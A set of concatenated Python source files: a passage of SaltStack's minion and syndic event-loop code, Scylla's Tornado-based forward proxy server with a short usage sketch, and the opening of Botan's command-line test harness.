''' # Add an extra fallback in case a forked process leaks through multiprocessing.active_children() # Cleanup Windows threads if not salt.utils.platform.is_windows(): return for thread in self.win_proc: if not thread.is_alive(): thread.join() try: self.win_proc.remove(thread) del thread except (ValueError, NameError): pass def _setup_core(self): ''' Set up the core minion attributes. This is safe to call multiple times. ''' if not self.ready: # First call. Initialize. self.functions, self.returners, self.function_errors, self.executors = self._load_modules() self.serial = salt.payload.Serial(self.opts) self.mod_opts = self._prep_mod_opts() # self.matcher = Matcher(self.opts, self.functions) self.matchers = salt.loader.matchers(self.opts) self.beacons = salt.beacons.Beacon(self.opts, self.functions) uid = salt.utils.user.get_uid(user=self.opts.get('user', None)) self.proc_dir = get_proc_dir(self.opts['cachedir'], uid=uid) self.grains_cache = self.opts['grains'] self.ready = True def setup_beacons(self, before_connect=False): ''' Set up the beacons. This is safe to call multiple times. ''' self._setup_core() loop_interval = self.opts['loop_interval'] new_periodic_callbacks = {} if 'beacons' not in self.periodic_callbacks: self.beacons = salt.beacons.Beacon(self.opts, self.functions) def handle_beacons(): # Process Beacons beacons = None try: beacons = self.process_beacons(self.functions) except Exception: log.critical('The beacon errored: ', exc_info=True) if beacons and self.connected: self._fire_master(events=beacons) new_periodic_callbacks['beacons'] = tornado.ioloop.PeriodicCallback( handle_beacons, loop_interval * 1000) if before_connect: # Make sure there is a chance for one iteration to occur before connect handle_beacons() if 'cleanup' not in self.periodic_callbacks: new_periodic_callbacks['cleanup'] = tornado.ioloop.PeriodicCallback( self._fallback_cleanups, loop_interval * 1000) # start all the other callbacks for periodic_cb in six.itervalues(new_periodic_callbacks): periodic_cb.start() self.periodic_callbacks.update(new_periodic_callbacks) def setup_scheduler(self, before_connect=False): ''' Set up the scheduler. This is safe to call multiple times. ''' self._setup_core() loop_interval = self.opts['loop_interval'] new_periodic_callbacks = {} if 'schedule' not in self.periodic_callbacks: if 'schedule' not in self.opts: self.opts['schedule'] = {} if not hasattr(self, 'schedule'): self.schedule = salt.utils.schedule.Schedule( self.opts, self.functions, self.returners, utils=self.utils, cleanup=[master_event(type='alive')]) try: if self.opts['grains_refresh_every']: # In minutes, not seconds! log.debug( 'Enabling the grains refresher. 
Will run every %d minute(s).', self.opts['grains_refresh_every'] ) self._refresh_grains_watcher(abs(self.opts['grains_refresh_every'])) except Exception as exc: log.error( 'Exception occurred in attempt to initialize grain refresh ' 'routine during minion tune-in: %s', exc ) # TODO: actually listen to the return and change period def handle_schedule(): self.process_schedule(self, loop_interval) new_periodic_callbacks['schedule'] = tornado.ioloop.PeriodicCallback(handle_schedule, 1000) if before_connect: # Make sure there is a chance for one iteration to occur before connect handle_schedule() if 'cleanup' not in self.periodic_callbacks: new_periodic_callbacks['cleanup'] = tornado.ioloop.PeriodicCallback( self._fallback_cleanups, loop_interval * 1000) # start all the other callbacks for periodic_cb in six.itervalues(new_periodic_callbacks): periodic_cb.start() self.periodic_callbacks.update(new_periodic_callbacks) # Main Minion Tune In def tune_in(self, start=True): ''' Lock onto the publisher. This is the main event loop for the minion :rtype : None ''' self._pre_tune() log.debug('Minion \'%s\' trying to tune in', self.opts['id']) if start: if self.opts.get('beacons_before_connect', False): self.setup_beacons(before_connect=True) if self.opts.get('scheduler_before_connect', False): self.setup_scheduler(before_connect=True) self.sync_connect_master() if self.connected: self._fire_master_minion_start() log.info('Minion is ready to receive requests!') # Make sure to gracefully handle SIGUSR1 enable_sigusr1_handler() # Make sure to gracefully handle CTRL_LOGOFF_EVENT if HAS_WIN_FUNCTIONS: salt.utils.win_functions.enable_ctrl_logoff_handler() # On first startup execute a state run if configured to do so self._state_run() self.setup_beacons() self.setup_scheduler() # schedule the stuff that runs every interval ping_interval = self.opts.get('ping_interval', 0) * 60 if ping_interval > 0 and self.connected: def ping_master(): try: def ping_timeout_handler(*_): if self.opts.get('auth_safemode', False): log.error('** Master Ping failed. Attempting to restart minion**') delay = self.opts.get('random_reauth_delay', 5) log.info('delaying random_reauth_delay %ss', delay) try: self.functions['service.restart'](service_name()) except KeyError: # Probably no init system (running in docker?) log.warning( 'ping_interval reached without response ' 'from the master, but service.restart ' 'could not be run to restart the minion ' 'daemon. ping_interval requires that the ' 'minion is running under an init system.' ) self._fire_master('ping', 'minion_ping', sync=False, timeout_handler=ping_timeout_handler) except Exception: log.warning('Attempt to ping master failed.', exc_on_loglevel=logging.DEBUG) self.periodic_callbacks['ping'] = tornado.ioloop.PeriodicCallback(ping_master, ping_interval * 1000) self.periodic_callbacks['ping'].start() # add handler to subscriber if hasattr(self, 'pub_channel') and self.pub_channel is not None: self.pub_channel.on_recv(self._handle_payload) elif self.opts.get('master_type') != 'disable': log.error('No connection to master found. 
Scheduled jobs will not run.') if start: try: self.io_loop.start() if self.restart: self.destroy() except (KeyboardInterrupt, RuntimeError): # A RuntimeError can be re-raised by Tornado on shutdown self.destroy() def _handle_payload(self, payload): if payload is not None and payload['enc'] == 'aes': if self._target_load(payload['load']): self._handle_decoded_payload(payload['load']) elif self.opts['zmq_filtering']: # In the filtering enabled case, we'd like to know when minion sees something it shouldnt log.trace( 'Broadcast message received not for this minion, Load: %s', payload['load'] ) # If it's not AES, and thus has not been verified, we do nothing. # In the future, we could add support for some clearfuncs, but # the minion currently has no need. def _target_load(self, load): # Verify that the publication is valid if 'tgt' not in load or 'jid' not in load or 'fun' not in load \ or 'arg' not in load: return False # Verify that the publication applies to this minion # It's important to note that the master does some pre-processing # to determine which minions to send a request to. So for example, # a "salt -G 'grain_key:grain_val' test.ping" will invoke some # pre-processing on the master and this minion should not see the # publication if the master does not determine that it should. if 'tgt_type' in load: match_func = self.matchers.get('{0}_match.match'.format(load['tgt_type']), None) if match_func is None: return False if load['tgt_type'] in ('grain', 'grain_pcre', 'pillar'): delimiter = load.get('delimiter', DEFAULT_TARGET_DELIM) if not match_func(load['tgt'], delimiter=delimiter): return False elif not match_func(load['tgt']): return False else: if not self.matchers['glob_match.match'](load['tgt']): return False return True def destroy(self): ''' Tear down the minion ''' if self._running is False: return self._running = False if hasattr(self, 'schedule'): del self.schedule if hasattr(self, 'pub_channel') and self.pub_channel is not None: self.pub_channel.on_recv(None) if hasattr(self.pub_channel, 'close'): self.pub_channel.close() del self.pub_channel if hasattr(self, 'periodic_callbacks'): for cb in six.itervalues(self.periodic_callbacks): cb.stop() def __del__(self): self.destroy() class Syndic(Minion): ''' Make a Syndic minion, this minion will use the minion keys on the master to authenticate with a higher level master. ''' def __init__(self, opts, **kwargs): self._syndic_interface = opts.get('interface') self._syndic = True # force auth_safemode True because Syndic don't support autorestart opts['auth_safemode'] = True opts['loop_interval'] = 1 super(Syndic, self).__init__(opts, **kwargs) self.mminion = salt.minion.MasterMinion(opts) self.jid_forward_cache = set() self.jids = {} self.raw_events = [] self.pub_future = None def _handle_decoded_payload(self, data): ''' Override this method if you wish to handle the decoded data differently. ''' # TODO: even do this?? 
data['to'] = int(data.get('to', self.opts['timeout'])) - 1 # Only forward the command if it didn't originate from ourselves if data.get('master_id', 0) != self.opts.get('master_id', 1): self.syndic_cmd(data) def syndic_cmd(self, data): ''' Take the now clear load and forward it on to the client cmd ''' # Set up default tgt_type if 'tgt_type' not in data: data['tgt_type'] = 'glob' kwargs = {} # optionally add a few fields to the publish data for field in ('master_id', # which master the job came from 'user', # which user ran the job ): if field in data: kwargs[field] = data[field] def timeout_handler(*args): log.warning('Unable to forward pub data: %s', args[1]) return True with tornado.stack_context.ExceptionStackContext(timeout_handler): self.local.pub_async(data['tgt'], data['fun'], data['arg'], data['tgt_type'], data['ret'], data['jid'], data['to'], io_loop=self.io_loop, callback=lambda _: None, **kwargs) def fire_master_syndic_start(self): # Send an event to the master that the minion is live if self.opts['enable_legacy_startup_events']: # Old style event. Defaults to false in Sodium release. self._fire_master( 'Syndic {0} started at {1}'.format( self.opts['id'], time.asctime() ), 'syndic_start', sync=False, ) self._fire_master( 'Syndic {0} started at {1}'.format( self.opts['id'], time.asctime() ), tagify([self.opts['id'], 'start'], 'syndic'), sync=False, ) # TODO: clean up docs def tune_in_no_block(self): ''' Executes the tune_in sequence but omits extra logging and the management of the event bus assuming that these are handled outside the tune_in sequence ''' # Instantiate the local client self.local = salt.client.get_local_client( self.opts['_minion_conf_file'], io_loop=self.io_loop) # add handler to subscriber self.pub_channel.on_recv(self._process_cmd_socket) def _process_cmd_socket(self, payload): if payload is not None and payload['enc'] == 'aes': log.trace('Handling payload') self._handle_decoded_payload(payload['load']) # If it's not AES, and thus has not been verified, we do nothing. # In the future, we could add support for some clearfuncs, but # the syndic currently has no need. @tornado.gen.coroutine def reconnect(self): if hasattr(self, 'pub_channel'): self.pub_channel.on_recv(None) if hasattr(self.pub_channel, 'close'): self.pub_channel.close() del self.pub_channel # if eval_master finds a new master for us, self.connected # will be True again on successful master authentication master, self.pub_channel = yield self.eval_master(opts=self.opts) if self.connected: self.opts['master'] = master self.pub_channel.on_recv(self._process_cmd_socket) log.info('Minion is ready to receive requests!') raise tornado.gen.Return(self) def destroy(self): ''' Tear down the syndic minion ''' # We borrowed the local clients poller so give it back before # it's destroyed. Reset the local poller reference. super(Syndic, self).destroy() if hasattr(self, 'local'): del self.local if hasattr(self, 'forward_events'): self.forward_events.stop() # TODO: need a way of knowing if the syndic connection is busted class SyndicManager(MinionBase): ''' Make a MultiMaster syndic minion, this minion will handle relaying jobs and returns from all minions connected to it to the list of masters it is connected to. Modes (controlled by `syndic_mode`: sync: This mode will synchronize all events and publishes from higher level masters cluster: This mode will only sync job publishes and returns Note: jobs will be returned best-effort to the requesting master. 
This also means (since we are using zmq) that if a job was fired and the master disconnects between the publish and return, that the return will end up in a zmq buffer in this Syndic headed to that original master. In addition, since these classes all seem to use a mix of blocking and non-blocking calls (with varying timeouts along the way) this daemon does not handle failure well, it will (under most circumstances) stall the daemon for ~15s trying to forward events to the down master ''' # time to connect to upstream master SYNDIC_CONNECT_TIMEOUT = 5 SYNDIC_EVENT_TIMEOUT = 5 def __init__(self, opts, io_loop=None): opts['loop_interval'] = 1 super(SyndicManager, self).__init__(opts) self.mminion = salt.minion.MasterMinion(opts) # sync (old behavior), cluster (only returns and publishes) self.syndic_mode = self.opts.get('syndic_mode', 'sync') self.syndic_failover = self.opts.get('syndic_failover', 'random') self.auth_wait = self.opts['acceptance_wait_time'] self.max_auth_wait = self.opts['acceptance_wait_time_max'] self._has_master = threading.Event() self.jid_forward_cache = set() if io_loop is None: install_zmq() self.io_loop = ZMQDefaultLoop.current() else: self.io_loop = io_loop # List of events self.raw_events = [] # Dict of rets: {master_id: {event_tag: job_ret, ...}, ...} self.job_rets = {} # List of delayed job_rets which was unable to send for some reason and will be resend to # any available master self.delayed = [] # Active pub futures: {master_id: (future, [job_ret, ...]), ...} self.pub_futures = {} def _spawn_syndics(self): ''' Spawn all the coroutines which will sign in the syndics ''' self._syndics = OrderedDict() # mapping of opts['master'] -> syndic masters = self.opts['master'] if not isinstance(masters, list): masters = [masters] for master in masters: s_opts = copy.copy(self.opts) s_opts['master'] = master self._syndics[master] = self._connect_syndic(s_opts) @tornado.gen.coroutine def _connect_syndic(self, opts): ''' Create a syndic, and asynchronously connect it to a master ''' auth_wait = opts['acceptance_wait_time'] failed = False while True: if failed: if auth_wait < self.max_auth_wait: auth_wait += self.auth_wait log.debug( "sleeping before reconnect attempt to %s [%d/%d]", opts['master'], auth_wait, self.max_auth_wait, ) yield tornado.gen.sleep(auth_wait) # TODO: log? log.debug( 'Syndic attempting to connect to %s', opts['master'] ) try: syndic = Syndic(opts, timeout=self.SYNDIC_CONNECT_TIMEOUT, safe=False, io_loop=self.io_loop, ) yield syndic.connect_master(failed=failed) # set up the syndic to handle publishes (specifically not event forwarding) syndic.tune_in_no_block() # Send an event to the master that the minion is live syndic.fire_master_syndic_start() log.info( 'Syndic successfully connected to %s', opts['master'] ) break except SaltClientError as exc: failed = True log.error( 'Error while bringing up syndic for multi-syndic. Is the ' 'master at %s responding?', opts['master'] ) except (KeyboardInterrupt, SystemExit): raise except Exception: failed = True log.critical( 'Unexpected error while connecting to %s', opts['master'], exc_info=True ) raise tornado.gen.Return(syndic) def _mark_master_dead(self, master): ''' Mark a master as dead. This will start the sign-in routine ''' # if its connected, mark it dead if self._syndics[master].done(): syndic = self._syndics[master].result() # pylint: disable=no-member self._syndics[master] = syndic.reconnect() else: # TODO: debug? 
log.info( 'Attempting to mark %s as dead, although it is already ' 'marked dead', master ) def _call_syndic(self, func, args=(), kwargs=None, master_id=None): ''' Wrapper to call a given func on a syndic, best effort to get the one you asked for ''' if kwargs is None: kwargs = {} successful = False # Call for each master for master, syndic_future in self.iter_master_options(master_id): if not syndic_future.done() or syndic_future.exception(): log.error( 'Unable to call %s on %s, that syndic is not connected', func, master ) continue try: getattr(syndic_future.result(), func)(*args, **kwargs) successful = True except SaltClientError: log.error( 'Unable to call %s on %s, trying another...', func, master ) self._mark_master_dead(master) if not successful: log.critical('Unable to call %s on any masters!', func) def _return_pub_syndic(self, values, master_id=None): ''' Wrapper to call the '_return_pub_multi' a syndic, best effort to get the one you asked for ''' func = '_return_pub_multi' for master, syndic_future in self.iter_master_options(master_id): if not syndic_future.done() or syndic_future.exception(): log.error( 'Unable to call %s on %s, that syndic is not connected', func, master ) continue future, data = self.pub_futures.get(master, (None, None)) if future is not None: if not future.done(): if master == master_id: # Targeted master previous send not done yet, call again later return False else: # Fallback master is busy, try the next one continue elif future.exception(): # Previous execution on this master returned an error log.error( 'Unable to call %s on %s, trying another...', func, master ) self._mark_master_dead(master) del self.pub_futures[master] # Add not sent data to the delayed list and try the next master self.delayed.extend(data) continue future = getattr(syndic_future.result(), func)(values, '_syndic_return', timeout=self._return_retry_timer(), sync=False) self.pub_futures[master] = (future, values) return True # Loop done and didn't exit: wasn't sent, try again later return False def iter_master_options(self, master_id=None): ''' Iterate (in order) over your options for master ''' masters = list(self._syndics.keys()) if self.opts['syndic_failover'] == 'random': shuffle(masters) if master_id not in self._syndics: master_id = masters.pop(0) else: masters.remove(master_id) while True: yield master_id, self._syndics[master_id] if not masters: break master_id = masters.pop(0) def _reset_event_aggregation(self): self.job_rets = {} self.raw_events = [] def reconnect_event_bus(self, something): future = self.local.event.set_event_handler(self._process_event) self.io_loop.add_future(future, self.reconnect_event_bus) # Syndic Tune In def tune_in(self): ''' Lock onto the publisher. 
This is the main event loop for the syndic ''' self._spawn_syndics() # Instantiate the local client self.local = salt.client.get_local_client( self.opts['_minion_conf_file'], io_loop=self.io_loop) self.local.event.subscribe('') log.debug('SyndicManager \'%s\' trying to tune in', self.opts['id']) # register the event sub to the poller self.job_rets = {} self.raw_events = [] self._reset_event_aggregation() future = self.local.event.set_event_handler(self._process_event) self.io_loop.add_future(future, self.reconnect_event_bus) # forward events every syndic_event_forward_timeout self.forward_events = tornado.ioloop.PeriodicCallback(self._forward_events, self.opts['syndic_event_forward_timeout'] * 1000, ) self.forward_events.start() # Make sure to gracefully handle SIGUSR1 enable_sigusr1_handler() self.io_loop.start() def _process_event(self, raw): # TODO: cleanup: Move down into event class mtag, data = self.local.event.unpack(raw, self.local.event.serial) log.trace('Got event %s', mtag) # pylint: disable=no-member tag_parts = mtag.split('/') if len(tag_parts) >= 4 and tag_parts[1] == 'job' and \ salt.utils.jid.is_jid(tag_parts[2]) and tag_parts[3] == 'ret' and \ 'return' in data: if 'jid' not in data: # Not a job return return if self.syndic_mode == 'cluster' and data.get('master_id', 0) == self.opts.get('master_id', 1): log.debug('Return received with matching master_id, not forwarding') return master = data.get('master_id') jdict = self.job_rets.setdefault(master, {}).setdefault(mtag, {}) if not jdict: jdict['__fun__'] = data.get('fun') jdict['__jid__'] = data['jid'] jdict['__load__'] = {} fstr = '{0}.get_load'.format(self.opts['master_job_cache']) # Only need to forward each load once. Don't hit the disk # for every minion return! if data['jid'] not in self.jid_forward_cache: jdict['__load__'].update( self.mminion.returners[fstr](data['jid']) ) self.jid_forward_cache.add(data['jid']) if len(self.jid_forward_cache) > self.opts['syndic_jid_forward_cache_hwm']: # Pop the oldest jid from the cache tmp = sorted(list(self.jid_forward_cache)) tmp.pop(0) self.jid_forward_cache = set(tmp) if master is not None: # __'s to make sure it doesn't print out on the master cli jdict['__master_id__'] = master ret = {} for key in 'return', 'retcode', 'success': if key in data: ret[key] = data[key] jdict[data['id']] = ret else: # TODO: config to forward these? 
If so we'll have to keep track of who # has seen them # if we are the top level masters-- don't forward all the minion events if self.syndic_mode == 'sync': # Add generic event aggregation here if 'retcode' not in data: self.raw_events.append({'data': data, 'tag': mtag}) def _forward_events(self): log.trace('Forwarding events') # pylint: disable=no-member if self.raw_events: events = self.raw_events self.raw_events = [] self._call_syndic('_fire_master', kwargs={'events': events, 'pretag': tagify(self.opts['id'], base='syndic'), 'timeout': self._return_retry_timer(), 'sync': False, }, ) if self.delayed: res = self._return_pub_syndic(self.delayed) if res: self.delayed = [] for master in list(six.iterkeys(self.job_rets)): values = list(six.itervalues(self.job_rets[master])) res = self._return_pub_syndic(values, master_id=master) if res: del self.job_rets[master] class ProxyMinionManager(MinionManager): ''' Create the multi-minion interface but for proxy minions ''' def _create_minion_object(self, opts, timeout, safe, io_loop=None, loaded_base_name=None, jid_queue=None): ''' Helper function to return the correct type of object ''' return ProxyMinion(opts, timeout, safe, io_loop=io_loop, loaded_base_name=loaded_base_name, jid_queue=jid_queue) def _metaproxy_call(opts, fn_name): metaproxy = salt.loader.metaproxy(opts) try: metaproxy_name = opts['metaproxy'] except KeyError: metaproxy_name = 'proxy' log.trace( 'No metaproxy key found in opts for id %s. ' 'Defaulting to standard proxy minion.', opts['id'] ) metaproxy_fn = metaproxy_name + '.' + fn_name return metaproxy[metaproxy_fn] class ProxyMinion(Minion): ''' This class instantiates a 'proxy' minion--a minion that does not manipulate the host it runs on, but instead manipulates a device that cannot run a minion. ''' # TODO: better name... @tornado.gen.coroutine def _post_master_init(self, master): ''' Function to finish init after connecting to a master This is primarily loading modules, pillars, etc. (since they need to know which master they connected to) If this function is changed, please check Minion._post_master_init to see if those changes need to be propagated. ProxyMinions need a significantly different post master setup, which is why the differences are not factored out into separate helper functions. ''' mp_call = _metaproxy_call(self.opts, 'post_master_init') return mp_call(self, master) def _target_load(self, load): ''' Verify that the publication is valid and applies to this minion ''' mp_call = _metaproxy_call(self.opts, 'target_load') return mp_call(self, load) def _handle_payload(self, payload): mp_call = _metaproxy_call(self.opts, 'handle_payload') return mp_call(self, payload) @tornado.gen.coroutine def _handle_decoded_payload(self, data): mp_call = _metaproxy_call(self.opts, 'handle_decoded_payload') return mp_call(self, data) @classmethod def _target(cls, minion_instance, opts, data, connected): mp_call = _metaproxy_call(opts, 'target') return mp_call(cls, minion_instance, opts, data, connected) @classmethod def _thread_return(cls, minion_instance, opts, data): mp_call = _metaproxy_call(opts, 'thread_return') return mp_call(cls, minion_instance, opts, data) @classmethod def _thread_multi_return(cls, minion_instance, opts, data): mp_call = _metaproxy_call(opts, 'thread_multi_return') return mp_call(cls, minion_instance, opts, data) class SProxyMinion(SMinion): ''' Create an object that has loaded all of the minion module functions, grains, modules, returners etc. 
The SProxyMinion allows developers to generate all of the salt minion functions and present them with these functions for general use. ''' def gen_modules(self, initial_load=False): ''' Tell the minion to reload the execution modules CLI Example: .. code-block:: bash salt '*' sys.reload_modules ''' self.opts['grains'] = salt.loader.grains(self.opts) self.opts['pillar'] = salt.pillar.get_pillar( self.opts, self.opts['grains'], self.opts['id'], saltenv=self.opts['saltenv'], pillarenv=self.opts.get('pillarenv'), ).compile_pillar() if 'proxy' not in self.opts['pillar'] and 'proxy' not in self.opts: errmsg = ( 'No "proxy" configuration key found in pillar or opts ' 'dictionaries for id {id}. Check your pillar/options ' 'configuration and contents. Salt-proxy aborted.' ).format(id=self.opts['id']) log.error(errmsg) self._running = False raise SaltSystemExit(code=salt.defaults.exitcodes.EX_GENERIC, msg=errmsg) if 'proxy' not in self.opts: self.opts['proxy'] = self.opts['pillar']['proxy'] # Then load the proxy module self.proxy = salt.loader.proxy(self.opts) self.utils = salt.loader.utils(self.opts, proxy=self.proxy) self.functions = salt.loader.minion_mods(self.opts, utils=self.utils, notify=False, proxy=self.proxy) self.returners = salt.loader.returners(self.opts, self.functions, proxy=self.proxy) self.matchers = salt.loader.matchers(self.opts) self.functions['sys.reload_modules'] = self.gen_modules self.executors = salt.loader.executors(self.opts, self.functions, proxy=self.proxy) fq_proxyname = self.opts['proxy']['proxytype'] # we can then sync any proxymodules down from the master # we do a sync_all here in case proxy code was installed by # SPM or was manually placed in /srv/salt/_modules etc. self.functions['saltutil.sync_all'](saltenv=self.opts['saltenv']) self.functions.pack['__proxy__'] = self.proxy self.proxy.pack['__salt__'] = self.functions self.proxy.pack['__ret__'] = self.returners self.proxy.pack['__pillar__'] = self.opts['pillar'] # Reload utils as well (chicken and egg, __utils__ needs __proxy__ and __proxy__ needs __utils__ self.utils = salt.loader.utils(self.opts, proxy=self.proxy) self.proxy.pack['__utils__'] = self.utils # Reload all modules so all dunder variables are injected self.proxy.reload_modules() if ('{0}.init'.format(fq_proxyname) not in self.proxy or '{0}.shutdown'.format(fq_proxyname) not in self.proxy): errmsg = 'Proxymodule {0} is missing an init() or a shutdown() or both. '.format(fq_proxyname) + \ 'Check your proxymodule. Salt-proxy aborted.' log.error(errmsg) self._running = False raise SaltSystemExit(code=salt.defaults.exitcodes.EX_GENERIC, msg=errmsg) self.module_executors = self.proxy.get('{0}.module_executors'.format(fq_proxyname), lambda: [])() proxy_init_fn = self.proxy[fq_proxyname + '.init'] proxy_init_fn(self.opts) self.opts['grains'] = salt.loader.grains(self.opts, proxy=self.proxy) # Sync the grains here so the proxy can communicate them to the master self.functions['saltutil.sync_grains'](saltenv='base') self.grains_cache = self.opts['grains'] self.ready = True
server.py
import random import socket import sys import traceback from multiprocessing import Process from tornado import httpclient, ioloop, iostream, web from tornado.httpclient import HTTPResponse from scylla.config import get_config from scylla.database import ProxyIP from scylla.loggings import logger # Using CurlAsyncHTTPClient because its proxy support httpclient.AsyncHTTPClient.configure("tornado.curl_httpclient.CurlAsyncHTTPClient") def get_proxy(https=False) -> ProxyIP: proxies: [ProxyIP] = ProxyIP.select().where(ProxyIP.is_valid == True).where(ProxyIP.stability >= 0.9) if https: proxies = proxies.where(ProxyIP.is_https == True) proxies = proxies.order_by(ProxyIP.updated_at.desc()).limit(63) proxy: ProxyIP = random.choice(proxies) return proxy class ForwardingRequestHandler(web.RequestHandler): """ A very rough ForwardingRequestHandler, only supports HTTP requests. """ SUPPORTED_METHODS = ['GET', 'POST', 'CONNECT'] def data_received(self, chunk): pass def get_proxy_and_forward(self): https = False # At present, this proxy does not support https if self.request.uri.startswith('https'): https = True disable_forward_proxy = get_config('disable_forward_proxy', default=False) if disable_forward_proxy: self.forward() else: proxy = get_proxy(https=https) self.forward(host=proxy.ip, port=proxy.port) @web.asynchronous def get(self, *args, **kwargs): self.get_proxy_and_forward() @web.asynchronous def post(self, *args, **kwargs): self.get_proxy_and_forward() def handle_response(self, response: HTTPResponse): if response.body: self.write(response.body) self.finish() elif response.error: logger.debug('The forward proxy has an error: {}'.format(response.error)) self.finish() else: self.finish() def forward(self, host=None, port=None): try: url = self.request.uri body = self.request.body if not body: body = None httpclient.AsyncHTTPClient().fetch( httpclient.HTTPRequest( url=url, method=self.request.method, body=body, headers=self.request.headers, follow_redirects=False, validate_cert=False, proxy_host=host, proxy_port=port), self.handle_response) except httpclient.HTTPError as e: logger.debug("tornado signalled HTTPError {}".format(e)) self.set_status(500) self.finish() except: self.set_status(500) self.write("Internal server error:\n" + ''.join(traceback.format_exception(*sys.exc_info()))) self.finish() @web.asynchronous def connect(self): logger.debug('Start CONNECT to %s', self.request.uri) host, port = self.request.uri.split(':') client = self.request.connection.stream def close_client(data: bytes = None) -> None: if upstream.closed(): return if data: upstream.write(data) upstream.close() def upstream_close(data: bytes = None) -> None: if client.closed(): return if data: client.write(data) client.close() def start_tunnel(): logger.debug('CONNECT tunnel established to %s', self.request.uri) client.read_until_close(close_client, upstream.write) upstream.read_until_close(upstream_close, client.write) client.write(b'HTTP/1.0 200 Connection established\r\n\r\n') def on_proxy_response(data: bytes = None) -> None: if data: first_line = data.splitlines()[0] http_v, status, text = first_line.split(None, 2) if int(status) == 200: logger.debug('Connected to upstream proxy %s', proxy) start_tunnel() return self.set_status(500) self.finish() def start_proxy_tunnel() -> None: upstream.write(b'CONNECT %s HTTP/1.1\r\n' % self.request.uri.encode()) upstream.write(b'Host: %s\r\n' % self.request.uri.encode()) upstream.write(b'Proxy-Connection: Keep-Alive\r\n\r\n') upstream.read_until(b'\r\n\r\n', on_proxy_response) s 
= socket.socket(socket.AF_INET, socket.SOCK_STREAM, 0) upstream = iostream.IOStream(s) proxy = get_proxy(self.request.uri.startswith('https')) if proxy: upstream.connect((proxy.ip, proxy.port), start_proxy_tunnel) else: upstream.connect((host, int(port)), start_tunnel) def make_app(): return web.Application([ (r'.*', ForwardingRequestHandler), ]) def start_forward_proxy_server(): app = make_app() port = int(get_config('proxy_port', default='8081')) app.listen(port) logger.info('Start forward proxy server on port {}'.format(port)) ioloop.IOLoop.current().start() def start_forward_proxy_server_non_blocking(): p = Process(target=start_forward_proxy_server, daemon=True) p.start()
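# --- Illustrative sketch (not part of the files above or below) ---------------
# Usage sketch for the forward proxy defined above: start_forward_proxy_server()
# listens on get_config('proxy_port', default '8081') and relays GET/POST (and
# CONNECT) requests through a randomly selected upstream ProxyIP. The snippet
# below shows one way a client could route traffic through it; it assumes the
# server is already running locally on the default port and that the `requests`
# package is installed -- both are assumptions, not part of this project.

import requests

FORWARD_PROXY = 'http://127.0.0.1:8081'  # assumption: default proxy_port on localhost


def fetch_via_forward_proxy(url: str) -> str:
    '''Fetch a plain-HTTP URL through the local forward proxy.'''
    resp = requests.get(
        url,
        proxies={'http': FORWARD_PROXY, 'https': FORWARD_PROXY},
        timeout=10,
    )
    resp.raise_for_status()
    return resp.text


if __name__ == '__main__':
    # Example: print the first 200 characters of a page fetched via the proxy.
    print(fetch_via_forward_proxy('http://example.com/')[:200])
# ------------------------------------------------------------------------------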
test_cli.py
#!/usr/bin/python """ (C) 2018,2019 Jack Lloyd Botan is released under the Simplified BSD License (see license.txt) """ import subprocess import sys import os import logging import optparse # pylint: disable=deprecated-module import time import shutil import tempfile import re import random import json import binascii # pylint: disable=global-statement,unused-argument CLI_PATH = None TESTS_RUN = 0 TESTS_FAILED = 0 class TestLogHandler(logging.StreamHandler, object): def emit(self, record): # Do the default stuff first super(TestLogHandler, self).emit(record) if record.levelno >= logging.ERROR: global TESTS_FAILED TESTS_FAILED += 1 def setup_logging(options): if options.verbose: log_level = logging.DEBUG elif options.quiet: log_level = logging.WARNING else: log_level = logging.INFO lh = TestLogHandler(sys.stdout) lh.setFormatter(logging.Formatter('%(levelname) 7s: %(message)s')) logging.getLogger().addHandler(lh) logging.getLogger().setLevel(log_level) def random_port_number(): return random.randint(1024, 65535) def test_cli(cmd, cmd_options, expected_output=None, cmd_input=None, expected_stderr=None, use_drbg=True): global TESTS_RUN TESTS_RUN += 1 opt_list = [] if isinstance(cmd_options, str): opt_list = cmd_options.split(' ') elif isinstance(cmd_options, list): opt_list = cmd_options if use_drbg: fixed_drbg_seed = "802" * 32 drbg_options = ['--rng-type=drbg', '--drbg-seed=' + fixed_drbg_seed] else: drbg_options = [] cmdline = [CLI_PATH, cmd] + drbg_options + opt_list logging.debug("Executing '%s'" % (' '.join([CLI_PATH, cmd] + opt_list))) stdout = None stderr = None if cmd_input is None: proc = subprocess.Popen(cmdline, stdout=subprocess.PIPE, stderr=subprocess.PIPE) (stdout, stderr) = proc.communicate() else: proc = subprocess.Popen(cmdline, stdin=subprocess.PIPE, stdout=subprocess.PIPE, stderr=subprocess.PIPE) (stdout, stderr) = proc.communicate(cmd_input.encode()) if stderr: if expected_stderr is None: logging.error("Got output on stderr %s (stdout was %s)", stderr, stdout) else: if stderr != expected_stderr: logging.error("Got output on stderr %s which did not match expected value %s", stderr, expected_stderr) output = stdout.decode('ascii').strip() if expected_output is not None: if output != expected_output: logging.error("Got unexpected output running cmd %s %s", cmd, cmd_options) logging.info("Output lengths %d vs expected %d", len(output), len(expected_output)) logging.info("Got %s", output) logging.info("Exp %s", expected_output) return output def check_for_command(cmd): cmdline = [CLI_PATH, 'has_command', cmd] proc = subprocess.Popen(cmdline) proc.communicate() return proc.returncode == 0 def cli_config_tests(_tmp_dir): prefix = test_cli("config", "prefix") cflags = test_cli("config", "cflags") ldflags = test_cli("config", "ldflags") libs = test_cli("config", "libs") if len(prefix) < 4 or prefix[0] != '/': logging.error("Bad prefix %s" % (prefix)) if ("-I%s/include/botan-2" % (prefix)) not in cflags: logging.error("Bad cflags %s" % (cflags)) if not ldflags.endswith(("-L%s/lib" % (prefix))): logging.error("Bad ldflags %s" % (ldflags)) if "-lbotan-2" not in libs: logging.error("Bad libs %s" % (libs)) def cli_help_tests(_tmp_dir): output = test_cli("help", None, None) # Maybe test format somehow?? 
